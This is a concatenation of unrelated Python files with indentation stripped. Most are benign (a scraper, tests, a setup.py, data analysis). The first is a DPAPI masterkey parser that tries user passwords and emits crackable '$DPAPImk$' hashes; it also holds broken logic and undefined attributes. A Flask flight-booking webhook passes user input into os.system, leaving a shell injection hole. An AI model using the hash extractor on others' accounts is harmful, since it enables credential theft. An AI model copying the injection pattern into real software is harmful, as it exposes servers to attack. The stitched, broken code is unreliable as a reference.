def __init__(self, raw=None):
if raw is not None:
self.parse(Eater(raw, endianness="<"))
def parse(self, eater_obj):
raise NotImplementedError("This function must be implemented in subclasses")
class DPAPIBlob(DataStruct):
"""Represents a DPAPI blob"""
def __init__(self, raw=None):
"""Constructs a DPAPIBlob. If raw is set, automatically calls
parse().
"""
self.version = None
self.provider = None
self.mkguid = None
self.mkversion = None
self.flags = None
self.description = None
self.cipherAlgo = None
self.keyLen = 0
self.hmac = None
self.strong = None
self.hashAlgo = None
self.hashLen = 0
self.cipherText = None
self.salt = None
self.blob = None
self.sign = None
self.cleartext = None
self.decrypted = False
self.signComputed = None
DataStruct.__init__(self, raw)
def __repr__(self):
s = ["DPAPI BLOB",
"\n".join(("\tversion = %(version)d",
"\tprovider = %(provider)s",
"\tmkey = %(mkguid)s",
"\tflags = %(flags)#x",
"\tdescr = %(description)s",
"\tcipherAlgo = %(cipherAlgo)r",
"\thashAlgo = %(hashAlgo)r")) % self.__dict__,
"\tsalt = %s" % self.salt.encode('hex'),
"\thmac = %s" % self.hmac.encode('hex'),
"\tcipher = %s" % self.cipherText.encode('hex'),
"\tsign = %s" % self.sign.encode('hex')]
if self.signComputed is not None:
s.append("\tsignComputed = %s" % self.signComputed.encode('hex'))
if self.cleartext is not None:
s.append("\tcleartext = %r" % self.cleartext)
return "\n".join(s)
class CryptoAlgo(object):
"""This class is used to wrap Microsoft algorithm IDs with M2Crypto"""
class Algo(object):
def __init__(self, data):
self.data = data
def __getattr__(self, attr):
if attr in self.data:
return self.data[attr]
raise AttributeError(attr)
_crypto_data = {}
@classmethod
def add_algo(cls, algnum, **kargs):
cls._crypto_data[algnum] = cls.Algo(kargs)
if 'name' in kargs:
kargs['ID'] = algnum
cls._crypto_data[kargs['name']] = cls.Algo(kargs)
@classmethod
def get_algo(cls, algnum):
return cls._crypto_data[algnum]
def __init__(self, i):
self.algnum = i
self.algo = CryptoAlgo.get_algo(i)
name = property(lambda self: self.algo.name)
module = property(lambda self: self.algo.module)
keyLength = property(lambda self: self.algo.keyLength / 8)
ivLength = property(lambda self: self.algo.IVLength / 8)
blockSize = property(lambda self: self.algo.blockLength / 8)
digestLength = property(lambda self: self.algo.digestLength / 8)
def do_fixup_key(self, key):
try:
return self.algo.keyFixup.__call__(key)
except AttributeError:
return key
def __repr__(self):
return "%s [%#x]" % (self.algo.name, self.algnum)
def des_set_odd_parity(key):
_lut = [1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, 16, 16, 19,
19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, 32, 32, 35, 35, 37,
37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, 49, 49, 50, 50, 52, 52, 55,
55, 56, 56, 59, 59, 61, 61, 62, 62, 64, 64, 67, 67, 69, 69, 70, 70, 73,
73, 74, 74, 76, 76, 79, 79, 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91,
91, 93, 93, 94, 94, 97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107,
107, 109, 109, 110, 110, 112, 112, 115, 115, 117, 117, 118, 118, 121,
121, 122, 122, 124, 124, 127, 127, 128, 128, 131, 131, 133, 133, 134,
134, 137, 137, 138, 138, 140, 140, 143, 143, 145, 145, 146, 146, 148,
148, 151, 151, 152, 152, 155, 155, 157, 157, 158, 158, 161, 161, 162,
162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174, 174, 176,
176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191,
191, 193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205,
205, 206, 206, 208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218,
218, 220, 220, 223, 223, 224, 224, 227, 227, 229, 229, 230, 230, 233,
233, 234, 234, 236, 236, 239, 239, 241, 241, 242, 242, 244, 244, 247,
247, 248, 248, 251, 251, 253, 253, 254, 254]
tmp = array.array("B")
tmp.fromstring(key)
for i, v in enumerate(tmp):
tmp[i] = _lut[v]
return tmp.tostring()
CryptoAlgo.add_algo(0x6603, name="DES3", keyLength=192, IVLength=64, blockLength=64, module=DES3,
keyFixup=des_set_odd_parity)
CryptoAlgo.add_algo(0x6611, name="AES", keyLength=128, IVLength=128, blockLength=128, module=AES)
CryptoAlgo.add_algo(0x660e, name="AES-128", keyLength=128, IVLength=128, blockLength=128, module=AES)
CryptoAlgo.add_algo(0x660f, name="AES-192", keyLength=192, IVLength=128, blockLength=128, module=AES)
CryptoAlgo.add_algo(0x6610, name="AES-256", keyLength=256, IVLength=128, blockLength=128, module=AES)
CryptoAlgo.add_algo(0x6601, name="DES", keyLength=64, IVLength=64, blockLength=64, module=DES,
keyFixup=des_set_odd_parity)
CryptoAlgo.add_algo(0x8009, name="HMAC", digestLength=160, blockLength=512)
CryptoAlgo.add_algo(0x8003, name="md5", digestLength=128, blockLength=512)
CryptoAlgo.add_algo(0x8004, name="sha1", digestLength=160, blockLength=512)
CryptoAlgo.add_algo(0x800c, name="sha256", digestLength=256, blockLength=512)
CryptoAlgo.add_algo(0x800d, name="sha384", digestLength=384, blockLength=1024)
CryptoAlgo.add_algo(0x800e, name="sha512", digestLength=512, blockLength=1024)
def pbkdf2_ms(passphrase, salt, keylen, iterations, digest='sha1'):
"""Implementation of PBKDF2 that allows specifying digest algorithm.
Returns the corresponding expanded key which is keylen long.
Note: This is not real pbkdf2, but instead a slight modification of it.
Seems like Microsoft tried to implement pbkdf2 but got the xoring wrong.
"""
buff = ""
i = 1
while len(buff) < keylen:
U = salt + struct.pack("!L", i)
i += 1
derived = hmac.new(passphrase, U, digestmod=lambda: hashlib.new(digest)).digest()
for r in xrange(iterations - 1):
actual = hmac.new(passphrase, derived, digestmod=lambda: hashlib.new(digest)).digest()
derived = ''.join([chr(ord(x) ^ ord(y)) for (x, y) in zip(derived, actual)])
buff += derived
return buff[:keylen]
def pbkdf2(passphrase, salt, keylen, iterations, digest='sha1'):
"""Implementation of PBKDF2 that allows specifying digest algorithm.
Returns the corresponding expanded key which is keylen long.
"""
buff = ""
i = 1
while len(buff) < keylen:
U = salt + struct.pack("!L", i)
i += 1
derived = hmac.new(passphrase, U, digestmod=lambda: hashlib.new(digest)).digest()
actual = derived
for r in xrange(iterations - 1):
actual = hmac.new(passphrase, actual, digestmod=lambda: hashlib.new(digest)).digest()
derived = ''.join([chr(ord(x) ^ ord(y)) for (x, y) in zip(derived, actual)])
buff += derived
return buff[:keylen]
def derivePwdHash(pwdhash, userSID, digest='sha1'):
"""Internal use. Computes the encryption key from a user's password hash"""
return hmac.new(pwdhash, (userSID + "\0").encode("UTF-16LE"), digestmod=lambda: hashlib.new(digest)).digest()
def dataDecrypt(cipherAlgo, hashAlgo, raw, encKey, iv, rounds):
"""Internal use. Decrypts data stored in DPAPI structures."""
hname = {"HMAC": "sha1"}.get(hashAlgo.name, hashAlgo.name)
derived = pbkdf2_ms(encKey, iv, cipherAlgo.keyLength + cipherAlgo.ivLength, rounds, hname)
key, iv = derived[:cipherAlgo.keyLength], derived[cipherAlgo.keyLength:]
key = key[:cipherAlgo.keyLength]
iv = iv[:cipherAlgo.ivLength]
cipher = cipherAlgo.module.new(key, mode=cipherAlgo.module.MODE_CBC, IV=iv)
cleartxt = cipher.decrypt(raw)
return cleartxt
def DPAPIHmac(hashAlgo, pwdhash, hmacSalt, value):
"""Internal function used to compute HMACs of DPAPI structures"""
hname = {"HMAC": "sha1"}.get(hashAlgo.name, hashAlgo.name)
encKey = hmac.new(pwdhash, digestmod=lambda: hashlib.new(hname))
encKey.update(hmacSalt)
encKey = encKey.digest()
rv = hmac.new(encKey, digestmod=lambda: hashlib.new(hname))
rv.update(value)
return rv.digest()
def display_masterkey(Preferred):
GUID1 = Preferred.read(8)
GUID2 = Preferred.read(8).decode()
GUID = struct.unpack("<LHH", GUID1)
GUID2 = struct.unpack(">HLH", GUID2)
print ("%s-%s-%s-%s-%s%s" % (format(GUID[0], '08x'), format(GUID[1], '04x'), format(GUID[2], '04x'), format(GUID2[0], '04x'), format(GUID2[1], '08x'), format(GUID2[2], '04x')))
class MasterKey(DataStruct):
"""This class represents a MasterKey block contained in a MasterKeyFile"""
def __init__(self, raw=None, SID=None, context=None):
self.decrypted = False
self.key = None
self.key_hash = None
self.hmacSalt = None
self.hmac = None
self.hmacComputed = None
self.cipherAlgo = None
self.hashAlgo = None
self.rounds = None
self.iv = None
self.version = None
self.ciphertext = None
self.SID = SID
self.context = context
DataStruct.__init__(self, raw)
def __getstate__(self):
d = dict(self.__dict__)
for k in ["cipherAlgo", "hashAlgo"]:
if k in d:
d[k] = d[k].algnum
return d
def __setstate__(self, d):
for k in ["cipherAlgo", "hashAlgo"]:
if k in d:
d[k] = CryptoAlgo(d[k])
self.__dict__.update(d)
def parse(self, data):
self.version = data.eat("L")
self.iv = data.eat("16s")
self.rounds = data.eat("L")
self.hashAlgo = CryptoAlgo(data.eat("L"))
self.cipherAlgo = CryptoAlgo(data.eat("L"))
self.ciphertext = data.remain()
if self.SID:
print (self.jhash())
def decryptWithHash(self, userSID, pwdhash):
"""Decrypts the masterkey with the given user's hash and SID.
Simply computes the corresponding key then calls self.decryptWithKey()
"""
self.decryptWithKey(derivePwdHash(pwdhash, userSID))
def jhash(self):
version = -1
hmac_algo = None
cipher_algo = None
if "des3" in str(self.cipherAlgo).lower() and "hmac" in str(self.hashAlgo).lower():
version = 1
hmac_algo = "sha1"
cipher_algo = "des3"
elif "aes-256" in str(self.cipherAlgo).lower() and "sha512" in str(self.hashAlgo).lower():
version = 2
hmac_algo = "sha512"
cipher_algo = "aes256"
else:
return "Unsupported combination of cipher '%s' and hash algorithm '%s' found!" % (self.cipherAlgo, self.hashAlgo)
context = 0
if self.context == "domain":
context = 2
s = "$DPAPImk$%d*%d*%s*%s*%s*%d*%s*%d*%s" % (version, context, self.SID, cipher_algo, hmac_algo, self.rounds, binascii.hexlify(self.iv).encode(),
len(binascii.hexlify(self.ciphertext)), binascii.hexlify(self.ciphertext))
context = 3
s += "\n$DPAPImk$%d*%d*%s*%s*%s*%d*%s*%d*%s" % (version, context, self.SID, cipher_algo, hmac_algo, self.rounds,
binascii.hexlify(self.iv), len(binascii.hexlify(self.ciphertext)), binascii.hexlify(self.ciphertext))
else:
if self.context == "local":
context = 1
elif self.context == "domain1607-":
context = 2
elif self.context == "domain1607+":
context = 3
s = "$DPAPImk$%d*%d*%s*%s*%s*%d*%s*%d*%s" % (version, context, self.SID, cipher_algo, hmac_algo, self.rounds,
binascii.hexlify(self.iv).decode(),len(binascii.hexlify(self.ciphertext)), binascii.hexlify(self.ciphertext).decode())
return s
def setKeyHash(self, h):
assert(len(h) == 20)
self.decrypted = True
self.key_hash = h
def setDecryptedKey(self, data):
assert len(data) == 64
self.decrypted = True
self.key = data
self.key_hash = hashlib.sha1(data).digest()
def decryptWithKey(self, pwdhash):
"""Decrypts the masterkey with the given encryption key. This function
also extracts the HMAC part of the decrypted stuff and compare it with
the computed one.
Note that, once successfully decrypted, the masterkey will not be
decrypted anymore; this function will simply return.
"""
if self.decrypted:
return
if not self.ciphertext:
return
cleartxt = dataDecrypt(self.cipherAlgo, self.hashAlgo, self.ciphertext, pwdhash, self.iv, self.rounds)
self.key = cleartxt[-64:]
self.hmacSalt = cleartxt[:16]
self.hmac = cleartxt[16:16 + self.hashAlgo.digestLength]
self.hmacComputed = DPAPIHmac(self.hashAlgo, pwdhash, self.hmacSalt, self.key)
self.decrypted = self.hmac == self.hmacComputed
def __repr__(self):
s = ["Masterkey block"]
if self.cipherAlgo is not None:
s.append("\tcipher algo = %s" % repr(self.cipherAlgo))
if self.hashAlgo is not None:
s.append("\thash algo = %s" % repr(self.hashAlgo))
if self.rounds is not None:
s.append("\trounds = %i" % self.rounds)
if self.iv is not None:
s.append("\tIV = %s" % binascii.hexlify(self.iv))
if self.key is not None:
s.append("\tkey = %s" % self.key.encode("hex"))
if self.hmacSalt is not None:
s.append("\thmacSalt = %s" % self.hmacSalt.encode("hex"))
if self.hmac is not None:
s.append("\thmac = %s" % self.hmac.encode("hex"))
if self.hmacComputed is not None:
s.append("\thmacComputed = %s" % self.hmacComputed.encode("hex"))
if self.key_hash is not None:
s.append("\tkey hash = %s" % self.key_hash.encode("hex"))
if self.ciphertext is not None:
s.append("\tciphertext = %s" % binascii.hexlify(self.ciphertext))
return "\n".join(s)
class MasterKeyFile(DataStruct):
"""This class represents a masterkey file."""
def __init__(self, raw=None, SID=None, context=None):
self.masterkey = None
self.backupkey = None
self.credhist = None
self.domainkey = None
self.decrypted = False
self.version = None
self.guid = None
self.policy = None
self.masterkeyLen = self.backupkeyLen = self.credhistLen = self.domainkeyLen = 0
self.SID = SID
self.context = context
DataStruct.__init__(self, raw)
def parse(self, data):
self.version = data.eat("L")
# print self.version
data.eat("2L")
self.guid = data.eat("72s").decode("UTF-16LE").encode("utf-8")
# print "GUID", self.guid
data.eat("2L")
self.policy = data.eat("L")
self.masterkeyLen = data.eat("Q")
# print self.masterkeyLen
self.backupkeyLen = data.eat("Q")
self.credhistLen = data.eat("Q")
self.domainkeyLen = data.eat("Q")
if self.masterkeyLen > 0:
self.masterkey = MasterKey(SID=self.SID, context=self.context)
self.masterkey.parse(data.eat_sub(self.masterkeyLen))
if self.backupkeyLen > 0:
self.backupkey = MasterKey()
self.backupkey.parse(data.eat_sub(self.backupkeyLen))
def decryptWithHash(self, userSID, h):
"""See MasterKey.decryptWithHash()"""
if not self.masterkey.decrypted:
self.masterkey.decryptWithHash(userSID, h)
if not self.backupkey.decrypted:
self.backupkey.decryptWithHash(userSID, h)
self.decrypted = self.masterkey.decrypted or self.backupkey.decrypted
def decryptWithPassword(self, userSID, pwd, context):
"""See MasterKey.decryptWithPassword()"""
algo = None
if context == "domain1607-" or context == "domain":
self.decryptWithHash(userSID, hashlib.new("md4", pwd.encode('UTF-16LE')).digest())
if self.decrypted:
print ("Decrypted succesfully as domain1607-")
return
if context == "domain1607+" or context == "domain":
SIDenc = userSID.encode("UTF-16LE")
NTLMhash = hashlib.new("md4", pwd.encode('UTF-16LE')).digest()
derived = pbkdf2(NTLMhash, SIDenc, 32, 10000, digest='sha256')
derived = pbkdf2(derived, SIDenc, 16, 1, digest='sha256')
self.decryptWithHash(userSID, derived)
if self.decrypted:
print ("Decrypted succesfully as domain1607+")
return
if context == "local":
self.decryptWithHash(userSID, hashlib.new("sha1", pwd.encode('UTF-16LE')).digest())
def __repr__(self):
s = ["\n#### MasterKeyFile %s ####" % self.guid]
if self.version is not None:
s.append("\tversion = %#d" % self.version)
if self.policy is not None:
s.append("\tPolicy = %#x" % self.policy)
if self.masterkeyLen > 0:
s.append("\tMasterKey = %d" % self.masterkeyLen)
if self.backupkeyLen > 0:
s.append("\tBackupKey = %d" % self.backupkeyLen)
if self.domainkeyLen > 0:
s.append("\tDomainKey = %d" % self.domainkeyLen)
if self.masterkey:
s.append(" + Master Key: %s" % repr(self.masterkey))
if self.backupkey:
s.append(" + Backup Key: %s" % repr(self.backupkey))
if self.domainkey:
s.append(" + %s" % repr(self.domainkey))
return "\n".join(s)
class MasterKeyPool(object):
"""This class is the pivot for using DPAPIck. It manages all the DPAPI
structures and contains all the decryption intelligence.
"""
def __init__(self):
self.keys = defaultdict(lambda: [])
self.passwords = set()
def addMasterKey(self, mkey, SID=None, context=None):
"""Add a MasterKeyFile is the pool.
mkey is a string representing the content of the file to add.
"""
mkf = MasterKeyFile(mkey, SID=SID, context=context)
self.keys[mkf.guid].append(mkf)
def addMasterKeyHash(self, guid, h):
self.keys[guid].append(MasterKeyFile().addKeyHash(guid, h))
def try_credential(self, userSID, password, context):
"""This function tries to decrypt every masterkey contained in the pool
that has not been successfully decrypted yet with the given password and
SID.
userSID is a string representing the user's SID
password is a string representing the user's password.
Returns the number of masterkey that has been successfully decrypted
with those credentials.
"""
n = 0
for mkl in self.keys.values():
if debug:
print(mkl)
for mk in mkl:
if not mk.decrypted:
if password is not None:
mk.decryptWithPassword(userSID, password, context)
if mk.decrypted:
self.passwords.add(password)
n += 1
return n
def __repr__(self):
s = ["MasterKeyPool:",
"Passwords:",
repr(self.passwords),
"Keys:",
repr(self.keys.items())]
if self.system is not None:
s.append(repr(self.system))
for i in self.creds.keys():
s.append("\tSID: %s" % i)
s.append(repr(self.creds[i]))
return "\n".join(s)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--sid', required=False, help="SID of account owning the masterkey file.")
parser.add_argument('-mk', '--masterkey', required=False, help="masterkey file (usually in %%APPDATA%%\\Protect\\<SID>).")
parser.add_argument('-d', '--debug', default=False, action='store_true', dest="debug")
parser.add_argument('-c', '--context', required=False, help="context of user account. 1607 refers to Windows 10 1607 update.", choices=['domain', 'domain1607+', 'domain1607-', 'local'])
parser.add_argument('-P', '--preferred', required=False, help="'Preferred' file containing GUID of masterkey file in use (usually in %%APPDATA%%\\Protect\\<SID>). Cannot be used with any other command.")
parser.add_argument("--password", metavar="PASSWORD", dest="password", help="password to decrypt masterkey file.")
options = parser.parse_args()
debug = options.debug
if options.preferred and (options.masterkey or options.sid or options.context):
print ("'Preferred' option cannot be used combined with any other, exiting.")
sys.exit(1)
elif not options.preferred and not (options.masterkey and options.sid and options.context):
print ("masterkey file, SID and context are mandatory in order to extract hash from masterkey file, exiting.")
sys.exit(1)
elif options.preferred:
Preferred = open(options.preferred,'rb')
display_masterkey(Preferred)
Preferred.close()
sys.exit(1)
else:
mkp = MasterKeyPool()
masterkeyfile = open(options.masterkey,'rb')
mkdata = masterkeyfile.read()
masterkeyfile.close()
mkp.addMasterKey(mkdata, SID=options.sid, context=options.context)
if options.password:
print (mkp.try_credential(options.sid, options.password, options.context))
|
# coding: utf-8
class Task:
pass
|
import sklearn.ensemble
from autosklearn.pipeline.components.classification.gradient_boosting import \
GradientBoostingClassifier
from .test_base import BaseClassificationComponentTest
class GradientBoostingComponentTest(BaseClassificationComponentTest):
__test__ = True
res = dict()
res["default_iris"] = 0.93999999999999995
res["default_iris_iterative"] = 0.95999999999999996
res["default_iris_proba"] = 0.36351844058108812
res["default_iris_sparse"] = -1
res["default_digits"] = 0.87795992714025506
res["default_digits_iterative"] = 0.78324225865209474
res["default_digits_binary"] = 0.99089253187613846
res["default_digits_multilabel"] = -1
res["default_digits_multilabel_proba"] = -1
sk_mod = sklearn.ensemble.ExtraTreesClassifier
module = GradientBoostingClassifier |
from setuptools import setup
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
install_requires = ['boto3', 'pandas<0.25.0', 'gokart>=0.2.4', 'tqdm']
setup(
name='thunderbolt',
use_scm_version=True,
setup_requires=["setuptools_scm"],
description='gokart file downloader',
long_description=long_description,
long_description_content_type="text/markdown",
license='MIT',
author='6syun9',
author_email='[email protected]',
url='https://vaaaaanquish.jp',
install_requires=install_requires,
packages=['thunderbolt'],
package_dir={'thunderbolt': 'thunderbolt'},
platforms='any',
tests_require=['moto==1.3.6'],
test_suite='test',
package_data={'thunderbolt': ['*.py']},
classifiers=['Programming Language :: Python :: 3.6'],
)
|
default = False
actions = 'store_true'
ENC = 'utf-8' |
#!/usr/bin/env python
class DemoAdd:
@staticmethod
def add(x, y):
return x + y
def main():
print "trigger"
print "hi"
demo = DemoAdd()
print demo.add(3, 4)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy_news.items import SoccerNewsItem
import scrapy_news.url_selector as url_selector
#to run
#scrapy crawl bbc
class BBCSpider(scrapy.Spider):
name = 'bbc'
allowed_domains = ['bbc.com']
source = 'BBC'
start_urls = url_selector.get_urls(source)
def parse(self, response):
url = response.url
datetime = response.css(".abbr-on ::text").extract_first()
headline = response.css(".story-headline ::text").extract_first()
subhead = response.css(".sp-story-body__introduction ::text").extract_first()
author = ""
body_text = " ".join(response.css(".story-body p ::text").extract())
body_text = body_text.replace("Media playback is not supported on this device", "")
body_text = body_text.replace(" Find all the latest football transfers on our dedicated page.", "")
body_text = body_text.replace(subhead, "")
notice = SoccerNewsItem(
headline=headline, subhead=subhead,
author=author, body_text=body_text,
url=url, datetime=datetime,
source=self.name)
yield notice
|
# /index.py
from flask import Flask, request, jsonify, render_template
import os
import dialogflow
import requests
import json
import pusher
import json
import pytz
import dateutil.parser
from datetime import date, time, datetime
import pprint
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
flight_list = []
url = ""
destination = ""
@app.route('/get_flight_details', methods=['POST'])
def get_flight_details():
global flight_list, url, destination
data = request.get_json(silent=True)
print(data['queryResult']['action'])
if data['queryResult']['action'] == "bookflight":
source = data['queryResult']['parameters']['source']
destination = data['queryResult']['parameters']['destination']
passengers = data['queryResult']['parameters']['passengers']
date = data['queryResult']['parameters']['date']
time_of_day = data['queryResult']['parameters']['time']
url = "http://flights.makemytrip.com/makemytrip/search/O/O/E/" + str(int(passengers)) + "/0/0/S/V0/" + str(source) + "_" + str(destination) + "_" + dateutil.parser.parse(date).strftime("%d-%m-%Y")
os.system("python2.7 scrape-makemytrip.py {0} {1} {2} {3}".format(source,destination,date,passengers))
flight_list = []
with open("out.json",'r') as file:
flights_dict = json.load(file)
for flight in flights_dict:
#print(flight["le"][0]["d"],destination)
if (flight["le"][0]["d"] != destination):
continue
if time_of_day == "earlymorning":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(5,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(8,59)):
flight_list.append(flight)
elif time_of_day == "morning":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(9,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(11,59)):
flight_list.append(flight)
elif time_of_day == "afternoon":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(12,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(16,59)):
flight_list.append(flight)
elif time_of_day == "evening":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(17,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(19,29)):
flight_list.append(flight)
elif time_of_day == "night":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(19,30)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(22,59)):
flight_list.append(flight)
elif time_of_day == "latenight":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(23,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(4,59)):
flight_list.append(flight)
#print(flight_list)
reply = {
"fulfillmentText": "Please wait while I search for the available flights. In the meantime, would you like to know more about your destination?",
}
return jsonify(reply)
elif data['queryResult']['action'] == "BookFlight.destinfo":
#destination = ""
pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(data['queryResult'])
print(data['queryResult']['outputContexts'],"\n")
print(data['queryResult']['outputContexts'][0],"\n")
print(data['queryResult']['outputContexts'][1],"\n")
outputContexts_list = data['queryResult']['outputContexts']
#nonlocal destination
# for outputContext_dict in outputContexts_list:
# #nonlocal destination
# if outputContext_dict["name"] == "bookflight-followup":
# destination = outputContext_dict['parameters']['destination']
print(destination,"\n")
with open("destfact.json",'r') as file:
destfact_list = json.loads(file.read())
print(destfact_list)
response = "Here is some information about your destination.<br><br>"
for destfact in destfact_list:
if destfact["code"] == destination:
response += destfact["info"]
response += "<br><br>Here are some fun facts about the city:<br><ul>"
for destfunfact in destfact["facts"]:
response+=("<li>"+destfunfact+"</li>")
response += "</ul>"
response +="<br><br>I have procured the details of the flights, would you like to see them now?"
reply = {
"fulfillmentText": response,
}
return jsonify(reply)
elif data['queryResult']['action'] == "BookFlight.destinfo.displaydetails":
response = """
These are the cheapest flights according to your preferences:
<ol>
"""
for flight in flight_list:
response += """
<li><a href = "{8}" >Rs. {0} - {1} flight {2}-{3} travelling from {4} to {5} on {6} at {7}. </li>
""".format(flight["af"] , flight["le"][0]["an"] , flight["le"][0]["fn"] , flight["le"][0]["oc"] , flight["le"][0]["f"] , flight["le"][0]["t"] , dateutil.parser.parse(flight["le"][0]["dep"]).strftime('%d / %m / %Y') , flight["le"][0]["fdt"] , url)
response += """
</ol>
"""
reply = {
"fulfillmentText": response,
}
return jsonify(reply)
def detect_intent_texts(project_id, session_id, text, language_code):
session_client = dialogflow.SessionsClient()
session = session_client.session_path(project_id, session_id)
if text:
text_input = dialogflow.types.TextInput(
text=text, language_code=language_code)
query_input = dialogflow.types.QueryInput(text=text_input)
response = session_client.detect_intent(
session=session, query_input=query_input)
return response.query_result.fulfillment_text
@app.route('/send_message', methods=['POST'])
def send_message():
message = request.form['message']
project_id = os.getenv('DIALOGFLOW_PROJECT_ID')
fulfillment_text = detect_intent_texts(project_id, "unique", message, 'en')
response_text = { "message": fulfillment_text }
return jsonify(response_text)
# run Flask app
if __name__ == "__main__":
app.run() |
from time import time_ns
from pyprocessing.utils import SingletonMeta
class RenderersDelegate:
def __init__(self, renderers, render_attr):
self.renderers = renderers
self.render_attr = render_attr
methods = (
m
for r in self.renderers
for m in dir(getattr(r, render_attr))
if not m.startswith('__')
)
for method in methods:
if not hasattr(self, method):
setattr(
self, method,
lambda *a, m=method, **kw: self.__delegate(
m, *a, **kw
)
)
def __delegate(self, mname, *args, **kwargs):
print(mname, args, kwargs)
for r in self.renderers:
getattr(getattr(r, self.render_attr), mname)(*args, **kwargs)
class PyProcessing(metaclass=SingletonMeta):
def __init__(self):
self.width = 640
self.height = 480
self.start_time_ns = 0
self.namespace = {}
self.renderers = []
def attach_renderer(self, renderer_class):
renderer = renderer_class(self)
renderer.init()
self.renderers.append(renderer)
def start(self):
for renderer in self.renderers:
renderer.start()
self.start_time_ns = time_ns()
@property
def windows(self):
return RenderersDelegate(self.renderers, 'window')
|
from tortoise import Tortoise
from tortoise.contrib import test
class TestCapabilities(test.TortoiseTransactionedTestModelsTestCase):
# pylint: disable=E1101
def setUp(self):
self.db = Tortoise.get_db_client("models")
self.caps = self.db.capabilities
def test_str(self):
self.assertIn("requires_limit", str(self.caps))
def test_immutability_1(self):
self.assertIsInstance(self.caps.dialect, str)
with self.assertRaises(AttributeError):
self.caps.dialect = "foo"
@test.expectedFailure
@test.requireCapability(connection_name="other")
def test_connection_name(self):
# Will fail with a `KeyError` since the connection `"other"` does not exist.
pass
@test.requireCapability(dialect="sqlite")
@test.expectedFailure
def test_actually_runs(self):
self.assertTrue(False) # pylint: disable=W1503
def test_attribute_error(self):
with self.assertRaises(AttributeError):
self.caps.bar = "foo"
@test.requireCapability(dialect="sqlite")
def test_dialect_sqlite(self):
self.assertEqual(self.caps.dialect, "sqlite")
@test.requireCapability(dialect="mysql")
def test_dialect_mysql(self):
self.assertEqual(self.caps.dialect, "mysql")
@test.requireCapability(dialect="postgres")
def test_dialect_postgres(self):
self.assertEqual(self.caps.dialect, "postgres")
|
#!/usr/bin/python
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.neighbors import KernelDensity
# import scikitlearn
######################################################################
# gaussian based density estimation for the targer feature (SalePrice)
######################################################################
def display_sell_price():
saleprice_values = df_numerical[target_feature].values.copy()
# compute mean and var for saleprice_values
min_saleprice = np.min(saleprice_values)
range_saleprice = np.max(saleprice_values) - min_saleprice
reduced_saleprice_values = (saleprice_values.copy()-min_saleprice)/range_saleprice
reduced_saleprice_values = reduced_saleprice_values.reshape(-1,1)
# density estimation for the value distibution
kde = KernelDensity(kernel='gaussian', bandwidth=0.05).fit(reduced_saleprice_values)
proba = np.exp(kde.score_samples(reduced_saleprice_values))
y_pos = 1 + proba*0.04*(np.random.normal(size = len(proba))-0.5)
lin_values = np.linspace(np.min(reduced_saleprice_values)-0.5, np.max(reduced_saleprice_values)+0.5, 100)
lin_values_2 = lin_values.copy()
lin_values_2 = lin_values_2*range_saleprice + min_saleprice
lin_values = lin_values.reshape(-1,1)
lin_proba = np.exp(kde.score_samples(lin_values))*0.1
plt.fill(np.concatenate((lin_values_2, lin_values_2[::-1])), np.concatenate((2-lin_proba, (2+lin_proba)[::-1]) ), facecolor='green', edgecolor='orangered', alpha=0.5, linewidth=1)
plt.scatter(saleprice_values, y_pos, s=1, marker = '.', c='k' )
plt.boxplot(saleprice_values, vert=False, positions = [3], widths = [0.5], sym = 'r+')
plt.ylim(0,4)
plt.xlim(0, np.max(saleprice_values))
plt.title('SalePrice values')
return
######################################################################
# plot a column values vs the values of the target
######################################################################
def plot_col_vs_target(dataframe, col, target_feature):
df_temp = dataframe[[col, target_feature]]
df_temp = df_temp.dropna()
plt.scatter(df_temp[col], df_temp[target_feature], marker = 'x')
plt.title(col + ' vs SalePrice')
return
######################################################################
# compute correlations between all pairs of numerical features
######################################################################
def compute_correlations(df_numerical):
print('test')
features = df_numerical.columns
size = len(features)
corr_matrix = np.ones((size, size))
for ind in range(size):
for ind2 in range(ind+1, size):
df_temp = df_numerical[[features[ind], features[ind2]]]
df_temp = df_temp.dropna()
corr_matrix[ind][ind2] = np.corrcoef(df_temp[features[ind]], df_temp[features[ind2]])[0, 1]
corr_matrix[ind2][ind] = corr_matrix[ind][ind2]
return corr_matrix
plt.rcParams.update({'font.size': 5})
df = pd.read_csv('data/train.csv')
# remove the ID
df.set_index('Id', inplace=True)
df.index.rename(None, inplace=True)
# print(df)
# select numerical variables
df.dtypes
df_numerical = df.select_dtypes(include = 'number')
df_numerical.columns
# Hold on, 'MSSubClass' is also a categorical variable
df_numerical = df_numerical.drop('MSSubClass', axis=1)
print(df_numerical.columns)
# look for nan values, get corresponding column's names
df_2 = df_numerical.isna().any()
# print(df_2['LotFrontage'])
# print(df_2)
